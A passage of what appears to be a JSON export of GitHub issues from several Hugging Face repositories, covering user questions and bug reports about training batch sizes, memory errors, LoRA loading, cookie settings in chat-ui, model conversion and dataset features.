CachedMultipleNegativesRankingLoss, and its mini_batch_size can go as high as 2048; a mini_batch_size greater than 2048 will cause a GPU memory OOM. \r\n\r\nNevertheless, when setting the mini_batch_size to 2048, I can still increase the global batch size (per_device_train_batch_size). Generally speaking, a larger batch size achieves better performance in contrastive learning settings. So, I tried different batch sizes (per_device_train_batch_size) and found they can be as large as 1048576 without causing a GPU memory OOM (and the GPU utilization is 100%). 
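\r\n\r\nFor reference, my setup looks roughly like this (the model name is a placeholder, not my real one):\r\n```python\r\nfrom sentence_transformers import SentenceTransformer, losses\r\n\r\nmodel = SentenceTransformer(\"sentence-transformers/all-MiniLM-L6-v2\")\r\n# mini_batch_size only bounds peak memory; the effective contrastive batch\r\n# is still per_device_train_batch_size\r\nloss = losses.CachedMultipleNegativesRankingLoss(model, mini_batch_size=2048)\r\n```\r\n\r\n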
So, I am wondering how to set a proper batch size (per_device_train_batch_size). Can it be infinitely big?", "url": "https://github.com/huggingface/sentence-transformers/issues/3134", "state": "open", "labels": [], "created_at": "2024-12-13T09:25:34Z", "updated_at": "2024-12-27T13:46:17Z", "user": "awmoe" }, { "repo": "huggingface/sentence-transformers", "number": 3133, "title": "How to avoid the long wait before training starts?", "body": "Dear developer,\r\n\r\nThanks for the great sentence-transformers library!\r\n\r\nI am finetuning [sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2](https://huggingface.co/sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2) on my own data, following the tutorial from: https://sbert.net/docs/sentence_transformer/training_overview.html\r\n\r\nI first finetuned it with a toy dataset containing only hundreds of triplet sentence samples; everything was fine and the finetuning was very fast.\r\n\r\nAfter that, I finetuned it with the real, big dataset containing 100 million triplet sentence samples. I found that it had to wait a long time (about 60 minutes) before training started, and the bigger the data, the longer the waiting time.\r\n\r\nSpecifically:\r\n\r\n1. It first spent 5 minutes on `Generating train split`.\r\n2. Then it spent 30 minutes on dataset mapping. \r\n3. After that, it printed `Detected kernel version 4.18.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.`.\r\n4. Then it waited about 60 minutes before the real training started.\r\n\r\nDuring the 60 minutes, I found that the GPU was working but the GPU utilization was relatively low (30%) and the GPU memory was not used. What's more, during the 60 minutes no log information was printed. Was it doing something like data preparation or tokenization? Could you tell me what it was doing, and how to avoid this long waiting time?\r\n\r\nAfter the 60-minute wait, it started the real training; the GPU utilization was as high as 80%, and around 70GB of GPU memory was used on an H100. What's more, the training progress bar printed something like `x/y [69:08:34<130:13:54, 1.09it/s]`, so I knew it was training.\r\n\r\nI also have another dataset which is 10 times larger than the 100 million triplet sentence samples; I worry that I will have to wait days for training to start if I use that huge dataset. \r\n\r\nCould you tell me what it was doing during the 60-minute wait, and how to avoid this long waiting time?\r\n\r\nThank you very much; I look forward to your reply.\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/3133", "state": "open", "labels": [], "created_at": "2024-12-13T09:10:32Z", "updated_at": "2024-12-25T03:46:50Z", "user": "awmoe" }, { "repo": "huggingface/lighteval", "number": 447, "title": "[BUG] how to eval a large-scale model using 1dp+8pp?", "body": "## Describe the bug\r\nI tried to eval a large-scale model using 1dp+8pp with accelerate. 
I use the command like the following:\r\n```\r\naccelerate launch --multi_gpu --num_processes=1 run_evals_accelerate.py \\\r\n --model_args=\"pretrained=\" \\\r\n --model_parallel \\\r\n --tasks \\\r\n --output_dir output_dir\r\n```\r\nThe error is ```ValueError: You need to use at least 2 processes to use --multi_gpu```\r\n\r\nHow to solve this problem?\r\n\r\n## Version info\r\nlighteval-0.3.0\r\n", "url": "https://github.com/huggingface/lighteval/issues/447", "state": "closed", "labels": [ "bug" ], "created_at": "2024-12-13T03:56:36Z", "updated_at": "2025-01-02T11:20:20Z", "user": "mxjmtxrm" }, { "repo": "huggingface/diffusers", "number": 10196, "title": "How to finetune Flux-dev full params, 80G OOM ...", "body": "I am using the [train_dreambooth_flux](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_flux.py) script to fine-tune the `flux-dev` model with full parameters using DeepSpeed Stage 2. However, I am still encountering out-of-memory issues on an 80GB GPU. Are there any solutions available to address this problem? Thanks!", "url": "https://github.com/huggingface/diffusers/issues/10196", "state": "open", "labels": [ "training" ], "created_at": "2024-12-12T09:24:18Z", "updated_at": "2025-08-20T13:19:20Z", "user": "huangjun12" }, { "repo": "huggingface/chat-ui", "number": 1627, "title": "Cookie \u201chf-chat\u201d has been rejected because there is an existing \u201csecure\u201d cookie.", "body": "## Bug description\r\n\r\nI use `ghcr.io/huggingface/chat-ui-db:latest` to host `ChatUI` in docker. If `PUBLIC_ORIGIN=\"http://localhost\"` in `.env.local` and visit `ChatUI` through `http://localhost:3000`, it works well. Then I try to replace `localhost` by my domain name `qiangwulab.sjtu.edu.cn`. For the sake of testing, I modify `/etc/hosts` so that `qiangwulab.sjtu.edu.cn` is resolved to `127.0.0.1`. I visit `ChatUI` through `http://qiangwulab.sjtu.edu.cn:3000`. It does not work with a similar page as in https://github.com/huggingface/chat-ui/issues/1057. The firefox console shows\r\n```\r\nCookie \u201chf-chat\u201d has been rejected because a non-HTTPS cookie can\u2019t be set as \u201csecure\u201d.\r\n```\r\nhttps://github.com/huggingface/chat-ui/issues/1057 says that I should use `ALLOW_INSECURE_COOKIES=true`. It still does not work, and the firefox console shows\r\n```\r\nCookie \u201chf-chat\u201d has been rejected because there is an existing \u201csecure\u201d cookie.\r\n```\r\n`ALLOW_INSECURE_COOKIES=true` seems to be Legacy. Thus, I also tried `COOKIE_SAMESITE=\"lax\"` and `COOKIE_SECURE=false`. The effect is the same. 
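\r\n\r\nFor reference, the relevant part of my `.env.local` at this point (domain as described above; a sketch, not the full file):\r\n```\r\nPUBLIC_ORIGIN="http://qiangwulab.sjtu.edu.cn:3000"\r\nALLOW_INSECURE_COOKIES=true\r\nCOOKIE_SAMESITE="lax"\r\nCOOKIE_SECURE=false\r\n```\r\n\r\n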
The firefox console shows\r\n```\r\nCookie \u201chf-chat\u201d has been rejected because there is an existing \u201csecure\u201d cookie.\r\n```\r\nIs it possible to use `http` for a domain name other than `localhost`?\r\n\r\n## Steps to reproduce\r\n\r\n\r\n\r\n## Screenshots\r\n\r\n\r\n\r\n## Context\r\n\r\n### Logs\r\n\r\n\r\n\r\n```\r\n// logs here if relevant\r\n```\r\n\r\n### Specs\r\n\r\n- **OS**: ubuntu 24.04\r\n- **Browser**: firefox\r\n- **chat-ui commit**: ghcr.io/huggingface/chat-ui-db:latest\r\n\r\n### Config\r\n\r\n\r\n\r\n## Notes\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1627", "state": "open", "labels": [ "bug" ], "created_at": "2024-12-12T07:04:26Z", "updated_at": "2024-12-12T07:04:26Z", "comments": 0, "user": "ljw20180420" }, { "repo": "huggingface/diffusers", "number": 10190, "title": "How to use fluxfill to replace the background?", "body": "I want to use fluxfill to change the background, but I find that the prompt is almost useless and the output image looks very much like the original image. \r\nI have tested multiple guidance_scale values, but found that the resulting image is strongly tied to the original image and only weakly related to the prompt.", "url": "https://github.com/huggingface/diffusers/issues/10190", "state": "closed", "labels": [], "created_at": "2024-12-11T10:48:27Z", "updated_at": "2025-05-23T12:12:28Z", "user": "babyta" }, { "repo": "huggingface/sentence-transformers", "number": 3132, "title": "How to train a model with DDP for TSDAE", "body": "Hello, I want to train a model using the TSDAE method.\r\n\r\nIs there any way to train with DDP (multi-GPU)?\r\n\r\nI already read your sample code, \r\nbut I'm not sure how to apply DenoisingAutoEncoderDataset in SentenceTransformerTrainer.\r\n([[v3] Training refactor - MultiGPU, loss logging, bf16, etc](https://github.com/UKPLab/sentence-transformers/pull/2449))", "url": "https://github.com/huggingface/sentence-transformers/issues/3132", "state": "closed", "labels": [], "created_at": "2024-12-11T10:39:30Z", "updated_at": "2024-12-11T14:04:32Z", "user": "OnAnd0n" }, { "repo": "huggingface/diffusers", "number": 10180, "title": "Can't load multiple loras when using Flux Control LoRA ", "body": "### Describe the bug\n\nI was trying out the FluxControlPipeline with the Control LoRA introduced in #9999, but had issues loading multiple loras. \r\n\r\nFor example, if I load the depth lora first and then the 8-step lora, it errors on the 8-step lora, and if I load the 8-step lora first and then the depth lora, it errors when loading the depth lora. 
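\r\n\r\nLooking at the traceback below, the crash seems to come from `module_bias = module.bias.data if hasattr(module, \"bias\") else None` in `_maybe_expand_transformer_param_shape_or_error_`: `hasattr` is true for an `nn.Linear` even when `bias` is `None`, so `.data` is read from `None`. I assume (from the logs only, not a verified patch) that a guard like this would avoid it:\r\n```python\r\nmodule_bias = module.bias.data if module.bias is not None else None\r\n```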
\r\n\r\n\n\n### Reproduction\n\n```\r\nfrom diffusers import FluxControlPipeline\r\nfrom huggingface_hub import hf_hub_download\r\nimport torch\r\n\r\ncontrol_pipe = FluxControlPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16).to(\"cuda\")\r\ncontrol_pipe.load_lora_weights(\"black-forest-labs/FLUX.1-Depth-dev-lora\")\r\ncontrol_pipe.load_lora_weights(hf_hub_download(\"ByteDance/Hyper-SD\", \"Hyper-FLUX.1-dev-8steps-lora.safetensors\"))\r\n\r\n```\n\n### Logs\n\n```shell\nAttributeError Traceback (most recent call last)\r\nCell In[6], line 8\r\n 5 control_pipe = FluxControlPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16).to(\"cuda\")\r\n 7 control_pipe.load_lora_weights(\"black-forest-labs/FLUX.1-Depth-dev-lora\")\r\n----> 8 control_pipe.load_lora_weights(\r\n 9 hf_hub_download(\r\n 10 \"ByteDance/Hyper-SD\", \"Hyper-FLUX.1-dev-8steps-lora.safetensors\"\r\n 11 ),\r\n 12 adapter_name=\"HyperFlux\",\r\n 13 )\r\n\r\nFile ~/.venv/lib/python3.10/site-packages/diffusers/loaders/lora_pipeline.py:1856, in FluxLoraLoaderMixin.load_lora_weights(self, pretrained_model_name_or_path_or_dict, adapter_name, **kwargs)\r\n 1849 transformer_norm_state_dict = {\r\n 1850 k: state_dict.pop(k)\r\n 1851 for k in list(state_dict.keys())\r\n 1852 if \"transformer.\" in k and any(norm_key in k for norm_key in self._control_lora_supported_norm_keys)\r\n 1853 }\r\n 1855 transformer = getattr(self, self.transformer_name) if not hasattr(self, \"transformer\") else self.transformer\r\n-> 1856 has_param_with_expanded_shape = self._maybe_expand_transformer_param_shape_or_error_(\r\n 1857 transformer, transformer_lora_state_dict, transformer_norm_state_dict\r\n 1858 )\r\n 1860 if has_param_with_expanded_shape:\r\n 1861 logger.info(\r\n 1862 \"The LoRA weights contain parameters that have different shapes that expected by the transformer. \"\r\n 1863 \"As a result, the state_dict of the transformer has been expanded to match the LoRA parameter shapes. 
\"\r\n 1864 \"To get a comprehensive list of parameter names that were modified, enable debug logging.\"\r\n 1865 )\r\n\r\nFile ~/.venv/lib/python3.10/site-packages/diffusers/loaders/lora_pipeline.py:2316, in FluxLoraLoaderMixin._maybe_expand_transformer_param_shape_or_error_(cls, transformer, lora_state_dict, norm_state_dict, prefix)\r\n 2314 if isinstance(module, torch.nn.Linear):\r\n 2315 module_weight = module.weight.data\r\n-> 2316 module_bias = module.bias.data if hasattr(module, \"bias\") else None\r\n 2317 bias = module_bias is not None\r\n 2319 lora_A_weight_name = f\"{name}.lora_A.weight\"\r\n\r\nAttributeError: 'NoneType' object has no attribute 'data'\n```\n\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-5.15.0-124-generic-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.12\r\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.5\r\n- Transformers version: 4.47.0\r\n- Accelerate version: 1.2.0\r\n- PEFT version: 0.14.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA H100 80GB HBM3, 81559 MiB\r\n- Using GPU in script?: Yes\r\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@a-r-r-o-w @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/10180", "state": "closed", "labels": [ "bug", "help wanted", "lora" ], "created_at": "2024-12-10T21:40:24Z", "updated_at": "2024-12-20T09:00:33Z", "comments": 11, "user": "jonathanyin12" }, { "repo": "huggingface/transformers", "number": 35186, "title": "How to convert my Mask2Former model (ResNet-50 backbone) to Hugging Face transformer", "body": "### System Info\n\n```shell\n- `transformers` version: 4.34.0\r\n- Platform: Linux-6.8.0-31-generic-x86_64-with-glibc2.17\r\n- Python version: 3.8.20\r\n- Huggingface_hub version: 0.17.3\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 0.23.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: No\r\n- Using distributed or parallel set-up in script?: No\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI found the following script, but it only supports conversion for Mask2Former model (swin backbone) https://github.com/huggingface/transformers/blob/main/src/transformers/models/mask2former/convert_mask2former_original_pytorch_checkpoint_to_pytorch.py\r\n\r\nMay I ask for some guidance on how to adjust the script so that it can support ResNet-50 architecture?\n\n### Expected behavior\n\n```shell\nConvert my Mask2Former model (ResNet-50 backbone) to Hugging Face transformer\n```\n\n\n### Checklist\n\n- [X] I have read the migration guide in the readme. 
([pytorch-transformers](https://github.com/huggingface/transformers#migrating-from-pytorch-transformers-to-transformers); [pytorch-pretrained-bert](https://github.com/huggingface/transformers#migrating-from-pytorch-pretrained-bert-to-transformers))\n- [X] I checked if a related official extension example runs on my machine.", "url": "https://github.com/huggingface/transformers/issues/35186", "state": "closed", "labels": [], "created_at": "2024-12-10T19:17:22Z", "updated_at": "2025-01-18T08:03:21Z", "user": "yujunwei04" }, { "repo": "huggingface/datasets", "number": 7318, "title": "Introduce support for PDFs", "body": "### Feature request\n\nThe idea (discussed in the Discord server with @lhoestq ) is to have a Pdf type like Image/Audio/Video. For example, [Video](https://github.com/huggingface/datasets/blob/main/src/datasets/features/video.py) was recently added and shows how to decode a video file encoded in a dictionary like {\"path\": ..., \"bytes\": ...} as a VideoReader using decord. We want to do the same with pdf and get a [pypdfium2.PdfDocument](https://pypdfium2.readthedocs.io/en/stable/_modules/pypdfium2/_helpers/document.html#PdfDocument).\n\n### Motivation\n\nIn many cases PDFs contain very valuable information beyond text (e.g. images, figures). Support for PDFs would help create datasets where all the information is preserved.\n\n### Your contribution\n\nI can start the implementation of the Pdf type :)", "url": "https://github.com/huggingface/datasets/issues/7318", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-12-10T16:59:48Z", "updated_at": "2024-12-12T18:38:13Z", "comments": 6, "user": "yabramuvdi" }, { "repo": "huggingface/diffusers", "number": 10172, "title": "Raise an error when `len(gligen_images)` is not equal to `len(gligen_phrases)` in `StableDiffusionGLIGENTextImagePipeline`", "body": "To whom it may concern,\r\n\r\nI found that when using `StableDiffusionGLIGENTextImagePipeline`, no error is raised when `len(gligen_images)` is not equal to `len(gligen_phrases)`. When I dug into the source code, it seemed that these two features are zipped together in a for loop during preprocessing. I guess this will cause the longer one to be clipped unintentionally. (If my understanding is wrong, feel free to correct me.) Is there any possibility of raising an error, or at least a warning? Thanks in advance.\r\n\r\nSource Code: https://github.com/huggingface/diffusers/blob/v0.31.0/src/diffusers/pipelines/stable_diffusion_gligen/pipeline_stable_diffusion_gligen_text_image.py#L689\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/10172", "state": "closed", "labels": [], "created_at": "2024-12-10T14:25:48Z", "updated_at": "2024-12-11T08:59:44Z", "comments": 1, "user": "abcdefg133hi" }, { "repo": "huggingface/lerobot", "number": 568, "title": "Do I need two SO 100 arms to get started?", "body": "I have printed and assembled one arm, the follower version. 
Do I need two arms to record datasets and do testing?", "url": "https://github.com/huggingface/lerobot/issues/568", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2024-12-10T13:31:50Z", "updated_at": "2025-10-08T08:45:58Z", "user": "rabhishek100" }, { "repo": "huggingface/transformers", "number": 35152, "title": "how to load the weight of decoder.embed_tokens.weight separately from the shared weight?", "body": "### System Info\r\n\r\n- `transformers` version: 4.46.3\r\n- Platform: Linux-6.8.0-49-generic-x86_64-with-glibc2.17\r\n- Python version: 3.8.20\r\n- Huggingface_hub version: 0.26.2\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 1.0.1\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.4.1+cu121 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using distributed or parallel set-up in script?: \r\n- Using GPU in script?: \r\n- GPU type: NVIDIA RTX A4000\r\n\r\n\r\n### Who can help?\r\n\r\n@ArthurZucker @muellerzr @SunMarc\r\n\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nWhen I use t5 1.1 on a seq2seq task with a source vocab size of 59744 and a target vocab size of only 32, I set model.lm_head as below, so that softmax correctly computes each token's probability and score over the 32 candidates:\r\n```python\r\nmodel.lm_head = torch.nn.Linear(config.d_model, 32, bias=False)  # target_vocab_size = 32\r\n```\r\n\r\nEverything looks good while the model is training. But after training, I load the safetensors checkpoint as below:\r\n```python\r\ncheckpoint_path = \"./resultstest/checkpoint-100\"\r\nconfig = T5Config.from_pretrained(\"./onlychangelmhead/checkpoint-100/config.json\")\r\nmodel = T5ForConditionalGeneration(config)\r\nmodel.lm_head = torch.nn.Linear(config.d_model,target_vocab_size,bias=False)\r\nstate_dict = load_file(f\"{checkpoint_path}/model.safetensors\")\r\nmodel.load_state_dict(state_dict, strict=True) \r\n```\r\n\r\nAnd the issue comes up as:\r\n```\r\nTraceback (most recent call last):\r\n File \"bs_based_on_massdic_failed.py\", line 110, in \r\n model.load_state_dict(state_dict, strict=True)\r\n File \"/home/zhi/anaconda3/envs/peptide_completion/lib/python3.8/site-packages/torch/nn/modules/module.py\", line 2215, in load_state_dict\r\n raise RuntimeError('Error(s) in loading state_dict for {}:\\n\\t{}'.format(\r\nRuntimeError: Error(s) in loading state_dict for T5ForConditionalGeneration:\r\n\tMissing key(s) in state_dict: \"encoder.embed_tokens.weight\". \r\n\tsize mismatch for decoder.embed_tokens.weight: copying a param with shape torch.Size([32, 768]) from checkpoint, the shape in current model is torch.Size([59744, 768]).\r\n```\r\n\r\nWhen I print the shapes in the safetensors file, `lm_head.weight` looks fine with a size of `[32, 768]`, but there is no `decoder.embed_tokens`; alternatively, the way I load the safetensors file cannot properly restore the embed_tokens weight from the shared weight (I guess). So how can I fix this problem so the model fits my exact target vocab size of 32, which is not the same as the source vocab size? I would very much appreciate a reply. Best.\r\n\r\n \r\n\r\n### Expected behavior\r\n\r\nUse t5 1.1 to fit a task with a target vocab size of 32. 
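\r\n\r\nA loading approach I would expect to work (my assumption: `encoder.embed_tokens.weight` is missing from the checkpoint only because it is tied to `shared`, so a non-strict load should be safe once the decoder embedding matches the checkpoint shape):\r\n```python\r\nmodel = T5ForConditionalGeneration(config)\r\nmodel.lm_head = torch.nn.Linear(config.d_model, 32, bias=False)\r\nmodel.decoder.embed_tokens = torch.nn.Embedding(32, config.d_model)  # match the checkpoint's [32, 768]\r\nstate_dict = load_file(f\"{checkpoint_path}/model.safetensors\")\r\nmissing, unexpected = model.load_state_dict(state_dict, strict=False)\r\nprint(missing, unexpected)  # ideally only the tied encoder embedding is reported as missing\r\n```\r\nIn short: fit the 32-token target vocab. 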
And load the safetensor properly.", "url": "https://github.com/huggingface/transformers/issues/35152", "state": "closed", "labels": [ "bug" ], "created_at": "2024-12-08T15:46:55Z", "updated_at": "2025-01-22T08:03:52Z", "user": "SoSongzhi" }, { "repo": "huggingface/datasets", "number": 7311, "title": "How to get the original dataset name with username?", "body": "### Feature request\r\n\r\nThe issue is related to ray data https://github.com/ray-project/ray/issues/49008 which it requires to check if the dataset is the original one just after `load_dataset` and parquet files are already available on hf hub.\r\n\r\nThe solution used now is to get the dataset name, config and split, then `load_dataset` again and check the fingerprint. But it's unable to get the correct dataset name if it contains username. So how to get the dataset name with username prefix, or is there another way to query if a dataset is the original one with parquet available?\r\n\r\n@lhoestq \r\n\r\n### Motivation\r\n\r\nhttps://github.com/ray-project/ray/issues/49008\r\n\r\n### Your contribution\r\n\r\nWould like to fix that.", "url": "https://github.com/huggingface/datasets/issues/7311", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-12-08T07:18:14Z", "updated_at": "2025-01-09T10:48:02Z", "user": "npuichigo" }, { "repo": "huggingface/lerobot", "number": 555, "title": "To bulid my own policy, but have errors TypeError: '>' not supported between instances of 'int' and 'dict'", "body": "I improved the act policy in lerobot framework and created a new policy named myact. I mainly did the following:\r\nCreate the my_act folder in the lerobot/common/policies/ path\r\nCreate 'configuration_my_act.py' and 'modeling_my_act.py' in the + my_act folder\r\nCreate lerobot/configs/policy/myact yaml, which is modified to ` name: myact `\r\n\r\nBut when I'm done, run the following command and get an error:\r\n\r\nxvfb-run python lerobot/scripts/train.py \\\r\n hydra.run.dir=mypolicy/train/AlohaInsertion-v0\\\r\n policy=myact \\\r\n dataset_repo_id=lerobot/aloha_sim_insertion_human \\\r\n env=aloha \\\r\n env.task=AlohaInsertion-v0 \r\n\r\n\r\nINFO 2024-12-07 17:01:50 n/logger.py:106 Logs will be saved locally.\r\nINFO 2024-12-07 17:01:50 ts/train.py:337 make_dataset\r\nFetching 56 files: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 56/56 [00:00<00:00, 9842.48it/s]\r\nINFO 2024-12-07 17:01:56 ts/train.py:350 make_env\r\nINFO 2024-12-07 17:01:56 /__init__.py:88 MUJOCO_GL is not set, so an OpenGL backend will be chosen automatically.\r\nINFO 2024-12-07 17:01:57 /__init__.py:96 Successfully imported OpenGL backend: %s\r\nINFO 2024-12-07 17:01:57 /__init__.py:31 MuJoCo library version is: %s\r\nINFO 2024-12-07 17:02:03 ts/train.py:353 make_policy\r\n\r\nError executing job with overrides: ['policy=act', 'dataset_repo_id=lerobot/aloha_sim_insertion_human', 'env=aloha', 
'env.task=AlohaInsertion-v0']\r\nTraceback (most recent call last):\r\n File \"/root/autodl-tmp/lerobot/lerobot/scripts/train.py\", line 677, in train_cli\r\n train(\r\n File \"/root/autodl-tmp/lerobot/lerobot/scripts/train.py\", line 354, in train\r\n policy = make_policy(\r\n File \"/root/autodl-tmp/lerobot/lerobot/common/policies/factory.py\", line 105, in make_policy\r\n policy = policy_cls(policy_cfg, dataset_stats)\r\n File \"\", line 26, in __init__\r\n File \"/root/autodl-tmp/lerobot/lerobot/common/policies/act/configuration_act.py\", line 158, in __post_init__\r\n if self.n_action_steps > self.chunk_size:\r\nTypeError: '>' not supported between instances of 'int' and 'dict'\r\n\r\nSet the environment variable HYDRA_FULL_ERROR=1 for a complete stack trace.\r\n\r\nI also got this error when I ran lerobot's own act policy. Do you know how to solve it? Thank you!", "url": "https://github.com/huggingface/lerobot/issues/555", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2024-12-07T09:10:35Z", "updated_at": "2025-04-07T16:08:38Z", "user": "zhouzhq2021" }, { "repo": "huggingface/diffusers", "number": 10144, "title": "Why is the mochi diffusers video output worse than the mochi official code?", "body": "### Describe the bug\n\nThe quality of the video is worse.\n\n### Reproduction\n\nRun the code with the official prompt.\n\n### Logs\n\n_No response_\n\n### System Info\n\ndiffusers@main\r\n\r\n\n\n### Who can help?\n\n@a-r-r-o-w @yiyixuxu ", "url": "https://github.com/huggingface/diffusers/issues/10144", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-12-07T05:53:57Z", "updated_at": "2025-01-07T15:38:38Z", "comments": 10, "user": "foreverpiano" }, { "repo": "huggingface/peft", "number": 2264, "title": "Guidance Needed on Two-Stage Fine-Tuning with LoRA (SFT and DPO) for Model Adaptation", "body": "# I am planning to perform a two-stage fine-tuning process and need some guidance on how to proceed.\r\n\r\n\r\n## First Stage\r\n\r\n1. Load Base Model: I start by loading the base model, qwen1.5 32B.\r\n2. Apply LoRA Fine-Tuning: I then apply LoRA fine-tuning to this base model and obtain a new model state.\r\n3. Save Adapter Model: This fine-tuned model state is saved as adapter_model.safetensors, named qwen1.5_lora_sft.\r\n## Second Stage\r\n\r\n1. Load the Model from the First Stage: I load both qwen1.5 32B and qwen1.5_lora_sft. It's crucial that qwen1.5_lora_sft integrates correctly with the base model qwen1.5 32B.\r\n2. Continue Fine-Tuning: On this model, which already includes the LoRA adapter, I continue to apply LoRA and DPO for further fine-tuning.\r\n3. Save the New Adapter Model: After fine-tuning, I need to save the new adapter state, which includes adjustments from both the original LoRA and the new DPO.\r\n\r\n## My questions are:\r\n1. How do I load the model from the base model (qwen1.5 32B) with the LoRA module qwen1.5_lora_sft?\r\n2. How do I continue fine-tuning from the first-stage model, and save the LoRA model after DPO training with the base model (qwen1.5 32B) and only one qwen1.5_lora_sft_dpo module (adapter_model_sft_dpo.safetensors)?\r\n\r\n## What I have now\r\n1. base model: qwen1.5 32B model path\r\n2. qwen1.5_lora_sft module path: adapter_model.safetensors\r\n## What I need \r\n1. 
qwen1.5_lora_sft_dpo module: adapter_model_sft_dpo.safetensors\r\n\r\n## In other words\r\ntrain a base_model to get LoRA_weights_1\r\nbase_model_1 = merge(base_model and LoRA_weights_1)\r\ntrain base_model_1 to get LoRA_weights_2\r\nbase_model_2 = merge(base_model_1 and LoRA_weights_2)\r\n\r\nHow do I split base_model_2 back into base_model and LoRA_weights_1_2?\r\n\r\nThanks!", "url": "https://github.com/huggingface/peft/issues/2264", "state": "closed", "labels": [], "created_at": "2024-12-06T13:35:20Z", "updated_at": "2025-01-06T10:50:09Z", "comments": 5, "user": "none0663" }, { "repo": "huggingface/transformers", "number": 35118, "title": "How to load local transformers?", "body": "transformers==4.47.0.dev0\r\n \r\nI want to use my local transformers. I tried to set `sys.insert(0,'xxx/transformers/src')` and `PYTHONPATH=xxx/transformers/src`, but they don't work.\r\n\r\nPlease tell me why.", "url": "https://github.com/huggingface/transformers/issues/35118", "state": "closed", "labels": [], "created_at": "2024-12-06T10:07:57Z", "updated_at": "2024-12-12T04:05:08Z", "user": "yiyexy" }, { "repo": "huggingface/lerobot", "number": 552, "title": "Rounding to int32 makes the robot less precise. Do we have a solid reason for doing this?", "body": "### System Info\n\n```Shell\nLatest LeRobot. MacOS\n```\n\n\n### Information\n\n- [X] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1) Run teleoperation\r\n2) Measure preciseness with rounding and without,\r\nat lerobot/common/robot_devices/robots/manipulator.py\r\n\r\n![image](https://github.com/user-attachments/assets/c7706edd-9284-4736-9600-6c4202af11d2)\r\n\n\n### Expected behavior\n\nSmooth movement", "url": "https://github.com/huggingface/lerobot/issues/552", "state": "closed", "labels": [ "bug", "question", "stale" ], "created_at": "2024-12-05T16:31:49Z", "updated_at": "2025-10-08T13:08:50Z", "user": "1g0rrr" }, { "repo": "huggingface/tokenizers", "number": 1696, "title": "How to determine the splicing logic in post_processor based on the sentence to be tokenized?", "body": "For example,\r\n```python\r\ndef post_processor(self, token_ids_0, token_ids_1=None):\r\n if \"cls\" in token_ids_0:\r\n return processors.TemplateProcessing(\r\n single=f\"{cls} $A {sep}\",\r\n pair=f\"{cls} $A {sep} $B {cls}\",\r\n special_tokens=[\r\n (cls, cls_token_id),\r\n (sep, sep_token_id),\r\n ],\r\n )\r\n else:\r\n return processors.TemplateProcessing(\r\n single=f\"{sep} $A {cls}\",\r\n pair=f\"{sep} $A {cls} $B {sep}\",\r\n special_tokens=[\r\n (cls, cls_token_id),\r\n (sep, sep_token_id),\r\n ],\r\n )\r\n```\r\nThx~", "url": "https://github.com/huggingface/tokenizers/issues/1696", "state": "open", "labels": [], "created_at": "2024-12-05T14:05:13Z", "updated_at": "2024-12-05T14:05:13Z", "user": "gongel" }, { "repo": "huggingface/peft", "number": 2262, "title": "Could you provide example code for AdaLoRA finetuning a 